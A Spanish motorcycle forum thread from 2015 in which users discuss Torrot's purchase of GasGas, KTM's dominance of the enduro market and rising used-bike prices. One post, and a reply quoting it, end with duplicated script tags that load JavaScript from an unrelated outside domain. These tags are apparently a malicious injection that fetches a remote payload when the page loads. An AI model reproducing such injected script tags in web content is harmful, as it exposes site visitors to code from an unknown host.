Voy a cerrar el post si lo que se ponga no tenga nada que ver con lo inicial.

CAGANER
16/11/2015, 21:22
Perdón

conejilope
16/11/2015, 21:42
Me alegro que se salve gas gas. A ver si esta vez consiguen lanzarla otra vez a lo mas alto. Y que su moto de raid siga en catalogo

Cherokee
16/11/2015, 22:41
Pues a mi me molaban las tetas

gasclassic
16/11/2015, 23:02
Pues a mi me molaban las tetas

Y a mi, además si Torrot ha comprado GasGas, si guarda relación con el hilo, ¿no?

Tomy
16/11/2015, 23:03
:esperasndo:

Heribert
17/11/2015, 20:05
Ojala la nueva inyeccion de Torrot lleva la gestion empresarial a buen puerto, ya que seria una pena perder la marca definitivamente. Ademas tienen buenas maquinas.¡¡

Trencaterros
18/11/2015, 07:34
A parte de las enduro y trial, podrían sacar motos "lógicas" y bonitas a precios asequibles.

datos:

http://ccaa.elpais.com/ccaa/2015/11/16/catalunya/1447704667_641463.html

JOE VESPINO
18/11/2015, 09:49
Con las instalaciones y el know-how de GasGas, y 10 millones de euros encima de la mesa, espero que relancen la producción de motos logicas de enduro y se termine el monopolio de KTM; sinó me veo pagando 15.000 euros por moto.
<script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script><script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>

gasclassic
18/11/2015, 10:27
Con las instalaciones y el know-how de GasGas, y 10 millones de euros encima de la mesa, espero que relancen la producción de motos logicas de enduro y se termine el monopolio de KTM; sinó me veo pagando 15.000 euros por moto.
<script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script><script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>

O tirando de viejunas, que es una buena opción para usos normales.

JOE VESPINO
18/11/2015, 10:40
Bueno, eso ya es una elección muy personal. Yo en una enduro ni me planteo meterme en una moto con años.

Y la cotización de segunda mano está en función de valor de las nuevas. Las nuevas KTM, Beta, Sherco y las pocas japos nuevas que se venden cuestan 9.000-10.000 pavos y se está notando y mucho en el valor de las de segunda zarpa.

CAGANER
18/11/2015, 11:26
notando en qué sentido?

JOE VESPINO
18/11/2015, 11:51
Piden más

CAGANER
18/11/2015, 12:14
qué modelo y año es el más cotizado?

JOE VESPINO
18/11/2015, 12:27
logicamente los mas recientes, bro!!

CAGANER
18/11/2015, 14:39
meloneitor, me refería por ejemplo al caso naranja 4t, 250 vs 350 vs 450, bro, ca-bro

JOE VESPINO
18/11/2015, 15:26
Pues yo diría que la 350 bro!!, especialmente las jusvarnas, que son las que masmolan hoy en dia, pero en general todas las 4T, tambien la WR450 (..jondas y kawas yo no veo que hayan subido, y Beta y Sherco me parece que cotizan baratas).

Tampoco es que haya hecho un estudio de mercado, tenia la peke en venta y me he venido fijando precios de ofertas de segundamano en las webs habituales, pero desde septiembre lo he visto claro.

¿que tramas? ¿te has jartado de ir a comprar los bocadillos de lechuga en la sinvergüin? :lol:

CAGANER
18/11/2015, 16:18
:jorl::jorl::enchufao: